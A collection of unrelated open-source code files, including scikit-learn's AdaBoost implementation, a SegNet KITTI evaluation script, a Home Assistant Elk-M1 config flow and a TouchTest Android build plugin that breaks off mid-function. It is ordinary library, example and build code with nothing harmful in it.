y_codes = np.array([-1. / (n_classes - 1), 1.])
y_coding = y_codes.take(classes == y[:, np.newaxis])
# Displace zero probabilities so the log is defined.
# Also fix negative elements which may occur with
# negative sample weights.
proba = y_predict_proba # alias for readability
proba[proba < np.finfo(proba.dtype).eps] = np.finfo(proba.dtype).eps
# Boost weight using multi-class AdaBoost SAMME.R alg
estimator_weight = (-1. * self.learning_rate
* (((n_classes - 1.) / n_classes) *
inner1d(y_coding, np.log(y_predict_proba))))
# Only boost the weights if it will fit again
if not iboost == self.n_estimators - 1:
# Only boost positive weights
sample_weight *= np.exp(estimator_weight *
((sample_weight > 0) |
(estimator_weight < 0)))
return sample_weight, 1., estimator_error
def _boost_discrete(self, iboost, X, y, sample_weight):
"""Implement a single boost using the SAMME discrete algorithm."""
estimator = self._make_estimator()
try:
estimator.set_params(random_state=self.random_state)
except ValueError:
pass
estimator.fit(X, y, sample_weight=sample_weight)
y_predict = estimator.predict(X)
if iboost == 0:
self.classes_ = getattr(estimator, 'classes_', None)
self.n_classes_ = len(self.classes_)
# Instances incorrectly classified
incorrect = y_predict != y
# Error fraction
estimator_error = np.mean(
np.average(incorrect, weights=sample_weight, axis=0))
# Stop if classification is perfect
if estimator_error <= 0:
return sample_weight, 1., 0.
n_classes = self.n_classes_
# Stop if the error is at least as bad as random guessing
if estimator_error >= 1. - (1. / n_classes):
self.estimators_.pop(-1)
if len(self.estimators_) == 0:
raise ValueError('BaseClassifier in AdaBoostClassifier '
'ensemble is worse than random, ensemble '
'can not be fit.')
return None, None, None
# Boost weight using multi-class AdaBoost SAMME alg
estimator_weight = self.learning_rate * (
np.log((1. - estimator_error) / estimator_error) +
np.log(n_classes - 1.))
# Only boost the weights if I will fit again
if not iboost == self.n_estimators - 1:
# Only boost positive weights
sample_weight *= np.exp(estimator_weight * incorrect *
((sample_weight > 0) |
(estimator_weight < 0)))
return sample_weight, estimator_weight, estimator_error
def predict(self, X):
"""Predict classes for X.
The predicted class of an input sample is computed as the weighted mean
prediction of the classifiers in the ensemble.
Parameters
----------
X : {array-like, sparse matrix} of shape = [n_samples, n_features]
The training input samples. Sparse matrix can be CSC, CSR, COO,
DOK, or LIL. DOK and LIL are converted to CSR.
Returns
-------
y : array of shape = [n_samples]
The predicted classes.
"""
pred = self.decision_function(X)
if self.n_classes_ == 2:
return self.classes_.take(pred > 0, axis=0)
return self.classes_.take(np.argmax(pred, axis=1), axis=0)
def staged_predict(self, X):
"""Return staged predictions for X.
The predicted class of an input sample is computed as the weighted mean
prediction of the classifiers in the ensemble.
This generator method yields the ensemble prediction after each
iteration of boosting and therefore allows monitoring, such as to
determine the prediction on a test set after each boost.
Parameters
----------
X : array-like of shape = [n_samples, n_features]
The input samples.
Returns
-------
y : generator of array, shape = [n_samples]
The predicted classes.
"""
n_classes = self.n_classes_
classes = self.classes_
if n_classes == 2:
for pred in self.staged_decision_function(X):
yield np.array(classes.take(pred > 0, axis=0))
else:
for pred in self.staged_decision_function(X):
yield np.array(classes.take(
np.argmax(pred, axis=1), axis=0))
def decision_function(self, X):
"""Compute the decision function of ``X``.
Parameters
----------
X : {array-like, sparse matrix} of shape = [n_samples, n_features]
The training input samples. Sparse matrix can be CSC, CSR, COO,
DOK, or LIL. DOK and LIL are converted to CSR.
Returns
-------
score : array, shape = [n_samples, k]
The decision function of the input samples. The order of
outputs is the same of that of the `classes_` attribute.
Binary classification is a special cases with ``k == 1``,
otherwise ``k==n_classes``. For binary classification,
values closer to -1 or 1 mean more like the first or second
class in ``classes_``, respectively.
"""
check_is_fitted(self, "n_classes_")
X = self._validate_X_predict(X)
n_classes = self.n_classes_
classes = self.classes_[:, np.newaxis]
pred = None
if self.algorithm == 'SAMME.R':
# The weights are all 1. for SAMME.R
pred = sum(_samme_proba(estimator, n_classes, X)
for estimator in self.estimators_)
else: # self.algorithm == "SAMME"
pred = sum((estimator.predict(X) == classes).T * w
for estimator, w in zip(self.estimators_,
self.estimator_weights_))
pred /= self.estimator_weights_.sum()
if n_classes == 2:
pred[:, 0] *= -1
return pred.sum(axis=1)
return pred
def staged_decision_function(self, X):
"""Compute decision function of ``X`` for each boosting iteration.
This method allows monitoring (i.e. determine error on testing set)
after each boosting iteration.
Parameters
----------
X : {array-like, sparse matrix} of shape = [n_samples, n_features]
The training input samples. Sparse matrix can be CSC, CSR, COO,
DOK, or LIL. DOK and LIL are converted to CSR.
Returns
-------
score : generator of array, shape = [n_samples, k]
The decision function of the input samples. The order of
outputs is the same of that of the `classes_` attribute.
Binary classification is a special cases with ``k == 1``,
otherwise ``k==n_classes``. For binary classification,
values closer to -1 or 1 mean more like the first or second
class in ``classes_``, respectively.
"""
check_is_fitted(self, "n_classes_")
X = self._validate_X_predict(X)
n_classes = self.n_classes_
classes = self.classes_[:, np.newaxis]
pred = None
norm = 0.
for weight, estimator in zip(self.estimator_weights_,
self.estimators_):
norm += weight
if self.algorithm == 'SAMME.R':
# The weights are all 1. for SAMME.R
current_pred = _samme_proba(estimator, n_classes, X)
else: # elif self.algorithm == "SAMME":
current_pred = estimator.predict(X)
current_pred = (current_pred == classes).T * weight
if pred is None:
pred = current_pred
else:
pred += current_pred
if n_classes == 2:
tmp_pred = np.copy(pred)
tmp_pred[:, 0] *= -1
yield (tmp_pred / norm).sum(axis=1)
else:
yield pred / norm
def predict_proba(self, X):
"""Predict class probabilities for X.
The predicted class probabilities of an input sample is computed as
the weighted mean predicted class probabilities of the classifiers
in the ensemble.
Parameters
----------
X : {array-like, sparse matrix} of shape = [n_samples, n_features]
The training input samples. Sparse matrix can be CSC, CSR, COO,
DOK, or LIL. DOK and LIL are converted to CSR.
Returns
-------
p : array of shape = [n_samples]
The class probabilities of the input samples. The order of
outputs is the same of that of the `classes_` attribute.
"""
check_is_fitted(self, "n_classes_")
n_classes = self.n_classes_
X = self._validate_X_predict(X)
if self.algorithm == 'SAMME.R':
# The weights are all 1. for SAMME.R
proba = sum(_samme_proba(estimator, n_classes, X)
for estimator in self.estimators_)
else: # self.algorithm == "SAMME"
proba = sum(estimator.predict_proba(X) * w
for estimator, w in zip(self.estimators_,
self.estimator_weights_))
proba /= self.estimator_weights_.sum()
proba = np.exp((1. / (n_classes - 1)) * proba)
normalizer = proba.sum(axis=1)[:, np.newaxis]
normalizer[normalizer == 0.0] = 1.0
proba /= normalizer
return proba
def staged_predict_proba(self, X):
"""Predict class probabilities for X.
The predicted class probabilities of an input sample is computed as
the weighted mean predicted class probabilities of the classifiers
in the ensemble.
This generator method yields the ensemble predicted class probabilities
after each iteration of boosting and therefore allows monitoring, such
as to determine the predicted class probabilities on a test set after
each boost.
Parameters
----------
X : {array-like, sparse matrix} of shape = [n_samples, n_features]
The training input samples. Sparse matrix can be CSC, CSR, COO,
DOK, or LIL. DOK and LIL are converted to CSR.
Returns
-------
p : generator of array, shape = [n_samples]
The class probabilities of the input samples. The order of
outputs is the same of that of the `classes_` attribute.
"""
X = self._validate_X_predict(X)
n_classes = self.n_classes_
proba = None
norm = 0.
for weight, estimator in zip(self.estimator_weights_,
self.estimators_):
norm += weight
if self.algorithm == 'SAMME.R':
# The weights are all 1. for SAMME.R
current_proba = _samme_proba(estimator, n_classes, X)
else: # elif self.algorithm == "SAMME":
current_proba = estimator.predict_proba(X) * weight
if proba is None:
proba = current_proba
else:
proba += current_proba
real_proba = np.exp((1. / (n_classes - 1)) * (proba / norm))
normalizer = real_proba.sum(axis=1)[:, np.newaxis]
normalizer[normalizer == 0.0] = 1.0
real_proba /= normalizer
yield real_proba
def predict_log_proba(self, X):
"""Predict class log-probabilities for X.
The predicted class log-probabilities of an input sample is computed as
the weighted mean predicted class log-probabilities of the classifiers
in the ensemble.
Parameters
----------
X : {array-like, sparse matrix} of shape = [n_samples, n_features]
The training input samples. Sparse matrix can be CSC, CSR, COO,
DOK, or LIL. DOK and LIL are converted to CSR.
Returns
-------
p : array of shape = [n_samples]
The class probabilities of the input samples. The order of
outputs is the same of that of the `classes_` attribute.
"""
return np.log(self.predict_proba(X))
class AdaBoostRegressor(BaseWeightBoosting, RegressorMixin):
"""An AdaBoost regressor.
An AdaBoost [1] regressor is a meta-estimator that begins by fitting a
regressor on the original dataset and then fits additional copies of the
regressor on the same dataset but where the weights of instances are
adjusted according to the error of the current prediction. As such,
subsequent regressors focus more on difficult cases.
This class implements the algorithm known as AdaBoost.R2 [2].
Read more in the :ref:`User Guide <adaboost>`.
Parameters
----------
base_estimator : object, optional (default=DecisionTreeRegressor)
The base estimator from which the boosted ensemble is built.
Support for sample weighting is required.
n_estimators : integer, optional (default=50)
The maximum number of estimators at which boosting is terminated.
In case of perfect fit, the learning procedure is stopped early.
learning_rate : float, optional (default=1.)
Learning rate shrinks the contribution of each regressor by
``learning_rate``. There is a trade-off between ``learning_rate`` and
``n_estimators``.
loss : {'linear', 'square', 'exponential'}, optional (default='linear')
The loss function to use when updating the weights after each
boosting iteration.
random_state : int, RandomState instance or None, optional (default=None)
If int, random_state is the seed used by the random number generator;
If RandomState instance, random_state is the random number generator;
If None, the random number generator is the RandomState instance used
by `np.random`.
Attributes
----------
estimators_ : list of classifiers
The collection of fitted sub-estimators.
estimator_weights_ : array of floats
Weights for each estimator in the boosted ensemble.
estimator_errors_ : array of floats
Regression error for each estimator in the boosted ensemble.
feature_importances_ : array of shape = [n_features]
The feature importances if supported by the ``base_estimator``.
See also
--------
AdaBoostClassifier, GradientBoostingRegressor, DecisionTreeRegressor
References
----------
.. [1] Y. Freund, R. Schapire, "A Decision-Theoretic Generalization of
on-Line Learning and an Application to Boosting", 1995.
.. [2] H. Drucker, "Improving Regressors using Boosting Techniques", 1997.
"""
def __init__(self,
base_estimator=None,
n_estimators=50,
learning_rate=1.,
loss='linear',
random_state=None):
super(AdaBoostRegressor, self).__init__(
base_estimator=base_estimator,
n_estimators=n_estimators,
learning_rate=learning_rate,
random_state=random_state)
self.loss = loss
self.random_state = random_state
def fit(self, X, y, sample_weight=None):
"""Build a boosted regressor from the training set (X, y).
Parameters
----------
X : {array-like, sparse matrix} of shape = [n_samples, n_features]
The training input samples. Sparse matrix can be CSC, CSR, COO,
DOK, or LIL. DOK and LIL are converted to CSR.
y : array-like of shape = [n_samples]
The target values (real numbers).
sample_weight : array-like of shape = [n_samples], optional
Sample weights. If None, the sample weights are initialized to
1 / n_samples.
Returns
-------
self : object
Returns self.
"""
# Check loss
if self.loss not in ('linear', 'square', 'exponential'):
raise ValueError(
"loss must be 'linear', 'square', or 'exponential'")
# Fit
return super(AdaBoostRegressor, self).fit(X, y, sample_weight)
def _validate_estimator(self):
"""Check the estimator and set the base_estimator_ attribute."""
super(AdaBoostRegressor, self)._validate_estimator(
default=DecisionTreeRegressor(max_depth=3))
def _boost(self, iboost, X, y, sample_weight):
"""Implement a single boost for regression
Perform a single boost according to the AdaBoost.R2 algorithm and
return the updated sample weights.
Parameters
----------
iboost : int
The index of the current boost iteration.
X : {array-like, sparse matrix} of shape = [n_samples, n_features]
The training input samples. Sparse matrix can be CSC, CSR, COO,
DOK, or LIL. DOK and LIL are converted to CSR.
y : array-like of shape = [n_samples]
The target values (class labels in classification, real numbers in
regression).
sample_weight : array-like of shape = [n_samples]
The current sample weights.
Returns
-------
sample_weight : array-like of shape = [n_samples] or None
The reweighted sample weights.
If None then boosting has terminated early.
estimator_weight : float
The weight for the current boost.
If None then boosting has terminated early.
estimator_error : float
The regression error for the current boost.
If None then boosting has terminated early.
"""
estimator = self._make_estimator()
try:
estimator.set_params(random_state=self.random_state)
except ValueError:
pass
generator = check_random_state(self.random_state)
# Weighted sampling of the training set with replacement
# For NumPy >= 1.7.0 use np.random.choice
cdf = sample_weight.cumsum()
cdf /= cdf[-1]
uniform_samples = generator.random_sample(X.shape[0])
bootstrap_idx = cdf.searchsorted(uniform_samples, side='right')
# searchsorted returns a scalar
bootstrap_idx = np.array(bootstrap_idx, copy=False)
# Fit on the bootstrapped sample and obtain a prediction
# for all samples in the training set
estimator.fit(X[bootstrap_idx], y[bootstrap_idx])
y_predict = estimator.predict(X)
error_vect = np.abs(y_predict - y)
error_max = error_vect.max()
if error_max != 0.:
error_vect /= error_max
if self.loss == 'square':
error_vect **= 2
elif self.loss == 'exponential':
error_vect = 1. - np.exp(- error_vect)
# Calculate the average loss
estimator_error = (sample_weight * error_vect).sum()
if estimator_error <= 0:
# Stop if fit is perfect
return sample_weight, 1., 0.
elif estimator_error >= 0.5:
# Discard current estimator only if it isn't the only one
if len(self.estimators_) > 1:
self.estimators_.pop(-1)
return None, None, None
beta = estimator_error / (1. - estimator_error)
# Boost weight using AdaBoost.R2 alg
estimator_weight = self.learning_rate * np.log(1. / beta)
if not iboost == self.n_estimators - 1:
sample_weight *= np.power(
beta,
(1. - error_vect) * self.learning_rate)
return sample_weight, estimator_weight, estimator_error
def _get_median_predict(self, X, limit):
# Evaluate predictions of all estimators
predictions = np.array([
est.predict(X) for est in self.estimators_[:limit]]).T
# Sort the predictions
sorted_idx = np.argsort(predictions, axis=1)
# Find index of median prediction for each sample
weight_cdf = self.estimator_weights_[sorted_idx].cumsum(axis=1)
median_or_above = weight_cdf >= 0.5 * weight_cdf[:, -1][:, np.newaxis]
median_idx = median_or_above.argmax(axis=1)
median_estimators = sorted_idx[np.arange(X.shape[0]), median_idx]
# Return median predictions
return predictions[np.arange(X.shape[0]), median_estimators]
def predict(self, X):
"""Predict regression value for X.
The predicted regression value of an input sample is computed
as the weighted median prediction of the classifiers in the ensemble.
Parameters
----------
X : {array-like, sparse matrix} of shape = [n_samples, n_features]
The training input samples. Sparse matrix can be CSC, CSR, COO,
DOK, or LIL. DOK and LIL are converted to CSR.
Returns
-------
y : array of shape = [n_samples]
The predicted regression values.
"""
check_is_fitted(self, "estimator_weights_")
X = self._validate_X_predict(X)
return self._get_median_predict(X, len(self.estimators_))
def staged_predict(self, X):
"""Return staged predictions for X.
The predicted regression value of an input sample is computed
as the weighted median prediction of the classifiers in the ensemble.
This generator method yields the ensemble prediction after each
iteration of boosting and therefore allows monitoring, such as to
determine the prediction on a test set after each boost.
Parameters
----------
X : {array-like, sparse matrix} of shape = [n_samples, n_features]
The training input samples. Sparse matrix can be CSC, CSR, COO,
DOK, or LIL. DOK and LIL are converted to CSR.
Returns
-------
y : generator of array, shape = [n_samples]
The predicted regression values.
"""
check_is_fitted(self, "estimator_weights_")
X = self._validate_X_predict(X)
for i, _ in enumerate(self.estimators_, 1):
yield self._get_median_predict(X, limit=i)
|
mattvick/phantomjs
|
refs/heads/master
|
src/qt/qtwebkit/Tools/Scripts/webkitpy/style/checkers/__init__.py
|
6014
|
# Required for Python to search this directory for module files
|
mengli/MachineLearning
|
refs/heads/master
|
self_driving/segnet/evaluate_kitti.py
|
2
|
"""Evaluate SegNet.
nohup python -u -m self_driving.segnet.evaluate_kitti > self_driving/segnet/output.txt 2>&1 &
"""
import os
import tensorflow as tf
from utils import kitti_segnet
from scipy import misc
LOG_DIR = 'backup/segnet_kitti'
EPOCH = 237
BATCH_SIZE = 1
IMAGE_HEIGHT = 375
IMAGE_WIDTH = 1242
NUM_CLASSES = 2
test_dir = "/usr/local/google/home/limeng/Downloads/kitti/data_road/testing/test.txt"
colors = [
[255, 0, 255],
[255, 0, 0],
]
def color_mask(tensor, color):
return tf.reduce_all(tf.equal(tensor, color), 3)
def one_hot(labels):
color_tensors = tf.unstack(colors)
channel_tensors = list(map(lambda color: color_mask(labels, color), color_tensors))
one_hot_labels = tf.cast(tf.stack(channel_tensors, 3), 'float32')
return one_hot_labels
def rgb(logits):
softmax = tf.nn.softmax(logits)
argmax = tf.argmax(softmax, 3)
color_map = tf.constant(colors, dtype=tf.float32)
n = color_map.get_shape().as_list()[0]
one_hot = tf.one_hot(argmax, n, dtype=tf.float32)
one_hot_matrix = tf.reshape(one_hot, [-1, n])
rgb_matrix = tf.matmul(one_hot_matrix, color_map)
rgb_tensor = tf.reshape(rgb_matrix, [-1, IMAGE_HEIGHT, IMAGE_WIDTH, 3])
return tf.cast(rgb_tensor, tf.float32)
def main(_):
test_image_filenames, test_label_filenames = kitti_segnet.get_filename_list(test_dir)
index = 0
with tf.Graph().as_default():
with tf.device('/cpu:0'):
config = tf.ConfigProto()
config.gpu_options.allocator_type = 'BFC'
sess = tf.InteractiveSession(config=config)
images, labels = kitti_segnet.CamVidInputs(test_image_filenames,
test_label_filenames,
BATCH_SIZE,
shuffle=False)
saver = tf.train.import_meta_graph(os.path.join(LOG_DIR, "segnet.ckpt.meta"))
saver.restore(sess, tf.train.latest_checkpoint(LOG_DIR))
graph = tf.get_default_graph()
train_data = graph.get_tensor_by_name("train_data:0")
train_label = graph.get_tensor_by_name("train_labels:0")
is_training = graph.get_tensor_by_name("is_training:0")
logits = tf.get_collection("logits")[0]
# Start the queue runners.
coord = tf.train.Coordinator()
threads = tf.train.start_queue_runners(sess=sess, coord=coord)
for i in range(EPOCH):
image_batch, label_batch = sess.run([images, labels])
feed_dict = {
train_data: image_batch,
train_label: label_batch,
is_training: True
}
prediction = rgb(logits)
pred = sess.run([prediction], feed_dict)[0]
for batch in range(BATCH_SIZE):
misc.imsave('output/segnet_kitti/decision_%d.png' % index, pred[batch])
misc.imsave('output/segnet_kitti/train_%d.png' % index, image_batch[batch])
index += 1
coord.request_stop()
coord.join(threads)
if __name__ == '__main__':
tf.app.run(main=main)
|
anandsimmy/ecommerce
|
refs/heads/master
|
tests/functional/test_offer.py
|
70
|
from oscar.test.testcases import WebTestCase
class TestTheOfferListPage(WebTestCase):
def test_exists(self):
response = self.app.get('/offers/')
self.assertEqual(200, response.status_code)
|
matt-hammond-bbc/gst-plugins-bad-mpegtsdemux-mods
|
refs/heads/1.4.3-mods
|
gst/gaudieffects/blur-example.py
|
73
|
#!/usr/bin/python
import gobject; gobject.threads_init()
import pygst; pygst.require("0.10")
import gst
p = gst.parse_launch ("""
v4l2src !
videoconvert ! queue ! video/x-raw,width=320,height=240,framerate=30/1 ! gaussianblur qos=true name=vf ! videoconvert ! timeoverlay ! xvimagesink
""")
m = p.get_by_name ("vf")
m.set_property ("sigma", 0.5)
control = gst.Controller(m, "sigma")
control.set_interpolation_mode("sigma", gst.INTERPOLATE_LINEAR)
control.set("sigma", 0 * gst.SECOND, 0.5)
control.set("sigma", 5 * gst.SECOND, 10.0)
control.set("sigma", 25 * gst.SECOND, -5.0)
p.set_state (gst.STATE_PLAYING)
gobject.MainLoop().run()
|
adrienbrault/home-assistant
|
refs/heads/dev
|
homeassistant/components/elkm1/config_flow.py
|
3
|
"""Config flow for Elk-M1 Control integration."""
import asyncio
import logging
from urllib.parse import urlparse
import elkm1_lib as elkm1
import voluptuous as vol
from homeassistant import config_entries, exceptions
from homeassistant.const import (
CONF_ADDRESS,
CONF_HOST,
CONF_PASSWORD,
CONF_PREFIX,
CONF_PROTOCOL,
CONF_TEMPERATURE_UNIT,
CONF_USERNAME,
TEMP_CELSIUS,
TEMP_FAHRENHEIT,
)
from homeassistant.util import slugify
from . import async_wait_for_elk_to_sync
from .const import CONF_AUTO_CONFIGURE, DOMAIN
_LOGGER = logging.getLogger(__name__)
PROTOCOL_MAP = {"secure": "elks://", "non-secure": "elk://", "serial": "serial://"}
DATA_SCHEMA = vol.Schema(
{
vol.Required(CONF_PROTOCOL, default="secure"): vol.In(
["secure", "non-secure", "serial"]
),
vol.Required(CONF_ADDRESS): str,
vol.Optional(CONF_USERNAME, default=""): str,
vol.Optional(CONF_PASSWORD, default=""): str,
vol.Optional(CONF_PREFIX, default=""): str,
vol.Optional(CONF_TEMPERATURE_UNIT, default=TEMP_FAHRENHEIT): vol.In(
[TEMP_FAHRENHEIT, TEMP_CELSIUS]
),
}
)
VALIDATE_TIMEOUT = 35
async def validate_input(data):
"""Validate the user input allows us to connect.
Data has the keys from DATA_SCHEMA with values provided by the user.
"""
userid = data.get(CONF_USERNAME)
password = data.get(CONF_PASSWORD)
prefix = data[CONF_PREFIX]
url = _make_url_from_data(data)
requires_password = url.startswith("elks://")
if requires_password and (not userid or not password):
raise InvalidAuth
elk = elkm1.Elk(
{"url": url, "userid": userid, "password": password, "element_list": ["panel"]}
)
elk.connect()
if not await async_wait_for_elk_to_sync(elk, VALIDATE_TIMEOUT, url):
raise InvalidAuth
device_name = data[CONF_PREFIX] if data[CONF_PREFIX] else "ElkM1"
# Return info that you want to store in the config entry.
return {"title": device_name, CONF_HOST: url, CONF_PREFIX: slugify(prefix)}
def _make_url_from_data(data):
host = data.get(CONF_HOST)
if host:
return host
protocol = PROTOCOL_MAP[data[CONF_PROTOCOL]]
address = data[CONF_ADDRESS]
return f"{protocol}{address}"
class ConfigFlow(config_entries.ConfigFlow, domain=DOMAIN):
"""Handle a config flow for Elk-M1 Control."""
VERSION = 1
CONNECTION_CLASS = config_entries.CONN_CLASS_LOCAL_PUSH
def __init__(self):
"""Initialize the elkm1 config flow."""
self.importing = False
async def async_step_user(self, user_input=None):
"""Handle the initial step."""
errors = {}
if user_input is not None:
if self._url_already_configured(_make_url_from_data(user_input)):
return self.async_abort(reason="address_already_configured")
try:
info = await validate_input(user_input)
except asyncio.TimeoutError:
errors["base"] = "cannot_connect"
except InvalidAuth:
errors["base"] = "invalid_auth"
except Exception: # pylint: disable=broad-except
_LOGGER.exception("Unexpected exception")
errors["base"] = "unknown"
if "base" not in errors:
await self.async_set_unique_id(user_input[CONF_PREFIX])
self._abort_if_unique_id_configured()
if self.importing:
return self.async_create_entry(title=info["title"], data=user_input)
return self.async_create_entry(
title=info["title"],
data={
CONF_HOST: info[CONF_HOST],
CONF_USERNAME: user_input[CONF_USERNAME],
CONF_PASSWORD: user_input[CONF_PASSWORD],
CONF_AUTO_CONFIGURE: True,
CONF_TEMPERATURE_UNIT: user_input[CONF_TEMPERATURE_UNIT],
CONF_PREFIX: info[CONF_PREFIX],
},
)
return self.async_show_form(
step_id="user", data_schema=DATA_SCHEMA, errors=errors
)
async def async_step_import(self, user_input):
"""Handle import."""
self.importing = True
return await self.async_step_user(user_input)
def _url_already_configured(self, url):
"""See if we already have a elkm1 matching user input configured."""
existing_hosts = {
urlparse(entry.data[CONF_HOST]).hostname
for entry in self._async_current_entries()
}
return urlparse(url).hostname in existing_hosts
class InvalidAuth(exceptions.HomeAssistantError):
"""Error to indicate there is invalid auth."""
|
jdinsh/MyClientMap
|
refs/heads/master
|
plugins/com.soasta.touchtest.android/plugin.py
|
23
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import os, sys, subprocess, hashlib, time, shutil, zipfile
from time import sleep
from os import listdir
from os.path import isfile, join
def compile(c):
global project_dir
global sdk_dir
global deploy_type
global builder
global android
global config
global template_dir
global jar_dir
global touchtest_dir
global restore_performed
global classpath_separator
global moduleAvailable
global touchtest_module_dir_created
global blacklist
print "[DEBUG] TouchTest : %s" % c
config = c
# This Plugin is only for the Android platform.
if config['platform'] != 'android':
return
moduleAvailable = isAndroidModuleEnabled(config['tiapp'].properties['modules'], config['deploy_type'])
touchtest_module_dir_created = []
if moduleAvailable:
from android import Android
from compiler import Compiler
# Initialize variables
project_dir = config['project_dir']
sdk_dir = config['titanium_dir']
deploy_type = config['deploy_type']
template_dir = config['template_dir']
touchtest_dir = project_dir + "/plugins/com.soasta.touchtest.android"
jar_dir = touchtest_dir + "/lib/"
# Initialize blacklist
blacklist = getBlackList()
# print "[DEBUG] TouchTest : Blacklist is " + blacklist
# Initialize the restore_performed value to be False
restore_performed = False
# Initialize classpath
builder = config['android_builder']
android = Android(builder.name, builder.app_id, builder.sdk, 'test', builder.java)
full_resource_dir = os.path.join(builder.project_dir, builder.project_dir + "/bin/assets/Resources")
compiler = Compiler(config['tiapp'],
full_resource_dir,
builder.java,
project_dir + "/bin/Classes",
builder.project_gen_dir,
project_dir,
include_all_modules=True)
classpath = os.pathsep.join([builder.sdk.get_android_jar(), os.pathsep.join(compiler.jar_libraries)])
# Classpath separator on Windows is a semi-colon instead of a colon
classpath_separator = ":"
if (os.name == 'nt'):
classpath_separator = ";"
module_jars = findAndroidModuleJars(config['tiapp'].properties['modules'])
classpath = classpath + classpath_separator + jar_dir + "aspectjrt.jar"
classpath = classpath + classpath_separator + jar_dir + "aspectjtools.jar"
for module_jar in module_jars:
print "[DEBUG] TouchTest : Will also process %s" % module_jar
classpath = classpath + classpath_separator + module_jar
print "[DEBUG] TouchTest : Installing TouchTest Driver for Android"
print "[DEBUG] TouchTest : Preparing libraries"
print "[DEBUG] TouchTest : Using classpath %s" % classpath
createBackup("titanium")
createBackup("modules/titanium-ui")
step = 0
try:
step = 1
instrument(classpath, "titanium")
step = 2
instrument(classpath, "modules/titanium-ui")
step = 3
for module_jar in module_jars:
instrumentExternalJars(classpath, module_jar)
merge()
print "[DEBUG] TouchTest : TouchTest Driver for Android installed"
except:
print "[ERROR] TouchTest : Unexpected error:", sys.exc_info()[0], sys.exc_info()[1], sys.exc_info()[2], "- step ", str(step)
print "[ERROR] TouchTest : Exception occured. Restoring Titanium jar files."
restore("titanium")
restore("modules/titanium-ui")
print "[ERROR] TouchTest : TouchTest Driver was not installed."
def postbuild():
finalize()
def findAndroidModuleJars(modules):
module_jars = []
# Iterate through all available modules
for module in modules:
# Ignore the Module if it is not for android platform
if module['platform'] != 'android':
continue
# Ignore the TouchTest module
if module['id'] == 'com.soasta.touchtest':
continue
# Ignore the module if it's been blacklisted
if blacklist is not None:
module_name = "'" + module['id'] + "'"
if module_name in blacklist:
print "[DEBUG] TouchTest : Module " + module_name + " has been blacklisted, skipping this module for processing."
continue
# Does the module support the current deploy_type?
# We need to validate that the deploy-type key actually is present in the module.
# Because deploy-type key is not present on Titanium SDK before 3.0
if 'deploy-type' in module.keys():
if not module['deploy-type'] in ['', deploy_type]:
continue
# We will check if the module version is empty, if yes, we need to pick the most recent version available
moduleVersion = module['version']
if not module['version']:
print "[DEBUG] TouchTest : Version number for Module " + module['id'] + " was not found. Will search for the latest version."
moduleVersion = getModuleVersion(module)
if moduleVersion == None:
print "[DEBUG] TouchTest : No recent versions of Module " + module['id'] + " were found. Skipping this module."
continue
# Obtain module directory path
modulePath = getModulePath(module, moduleVersion)
if not modulePath:
print "[DEBUG] TouchTest : Module " + module['id'] + " not found, skipping the module."
continue
# We will create a copy of the module directory with a suffix .touchtest
# Thus, if the current module directory is module/1.1, the copy will be module/1.1.touchtest
module['version'] = moduleVersion + ".touchtest"
modulePathTouchTest = modulePath + ".touchtest"
# If the backup directory already exists from the previous build, clean it up now
if os.path.exists(modulePathTouchTest):
shutil.rmtree(modulePathTouchTest)
shutil.copytree(modulePath, modulePathTouchTest)
touchtest_module_dir_created.append(modulePathTouchTest)
# Set the new value of module directory (copy we just created), this will be used for weaving module jars
modulePath = modulePathTouchTest
# Find all files in the Module directory and make a list of all the jar files we need to weave
filesInModuleDir = [ file for file in listdir(modulePath) if isfile(join(modulePath,file)) ]
for file in filesInModuleDir:
fileName, fileExtension = os.path.splitext(file)
if fileExtension == ".jar":
module_jars.append(modulePath + "/" + str(file))
# Find all files in the module/lib directory and append all jar files to the list of jar files we need to weave
libDir = modulePath + "/lib"
if os.path.exists(libDir):
filesInLibDir = [ file for file in listdir(libDir) if isfile(join(libDir,file)) ]
for file in filesInLibDir:
fileName, fileExtension = os.path.splitext(file)
if fileExtension == ".jar":
module_jars.append(libDir + "/" + str(file))
if not os.path.exists(modulePathTouchTest):
os.makedirs(modulePathTouchTest)
# Return the list of jar file we need to weave
return module_jars
def getModuleVersion(module):
# The idea here is to find the most recent version of the module present either in Project
# directory or the SDK directory
# So we will iterate both project and SDK directories and return the most recent version
moduleDir = "/modules/android/" + module['id']
versionDirList = []
# Iterate through the module directory in project directory
modulePath = project_dir + moduleDir
# Build a list of all available versions
if os.path.exists(modulePath):
versionDirList = os.listdir(modulePath)
# Iterate through the module directory in SDK directory
modulePath = sdk_dir + moduleDir
# Build a list of all available versions
if os.path.exists(modulePath):
versionDirList = versionDirList + os.listdir(modulePath)
# Compare the major and minor version numbers with the latestVersion in store
# and return the most recent version we find
latestVersion = "0.0.0.0.0"
for filename in versionDirList:
versionNumbersList = filename.split('.')
latestVersionNumbersList = latestVersion.split('.')
for index in range(0, len(versionNumbersList)):
try:
if int(versionNumbersList[index]) > int(latestVersionNumbersList[index]):
latestVersion = filename
break
elif int(versionNumbersList[index]) < int(latestVersionNumbersList[index]):
break
elif int(versionNumbersList[index]) == int(latestVersionNumbersList[index]):
continue
except ValueError:
# If the directory name does not represent a version number, integer parsing will fail
# We should skip the directory and continue
continue
# Return the latest version
if latestVersion.split('.')[0] == "0":
print "[DEBUG] TouchTest : No versions found for module " + module['id']
return None
else:
print "[DEBUG] TouchTest : Latest Version for module " + module['id'] + " is " + latestVersion
return latestVersion
def getModulePath(module, moduleVersion):
# Create the module directory path assuming its in the project directory
moduleDir = "/modules/android/" + module['id'] + "/" + moduleVersion
modulePath = project_dir + moduleDir
# Check if the module actually exists in the project directory
if not os.path.exists(modulePath):
print "[DEBUG] TouchTest : Module " + module['id'] + " does not exist in the Project directory."
# Module does not exist in the project directory, try the SDK directory
modulePath = sdk_dir + moduleDir
# If the module doesn't exist in SDK directory either, skip it and continue
if not os.path.exists(modulePath):
return None
else:
print "[DEBUG] TouchTest : Module " + module['id'] + " found in the SDK directory."
return modulePath
else:
return modulePath
def finalize():
global restore_performed
# This Plugin is only for the Android platform.
if config['platform'] != 'android':
return
if moduleAvailable and restore_performed == False:
print "[DEBUG] TouchTest : Restoring files changed during build."
for dir in touchtest_module_dir_created:
if os.path.exists(dir):
shutil.rmtree(dir)
restore("titanium")
restore("modules/titanium-ui")
restore_performed = True
print "[DEBUG] TouchTest : The application is now TouchTest ready."
def createBackup(jar):
jar_file = template_dir + "/" + jar + ".jar"
jar_bak_file = jar_file + ".bak"
if not os.path.exists(jar_bak_file):
